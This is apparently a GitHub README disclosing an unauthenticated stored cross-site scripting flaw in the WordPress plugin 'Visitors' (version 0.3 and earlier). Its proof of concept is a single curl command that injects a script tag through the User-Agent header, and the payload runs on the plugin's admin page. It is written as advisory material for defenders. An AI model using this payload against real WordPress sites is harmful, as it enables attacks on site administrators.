.. | |||
README.md | Loading last commit info... |
README.md
Visitors <= 0.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
Description
The plugin is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. The plugin would display the user's user agent string without validation or encoding within the WordPress admin panel.
Proof of Concept
$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>"
The payload will be executed on the "visitors" page within the WordPress admin panel.
References
https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc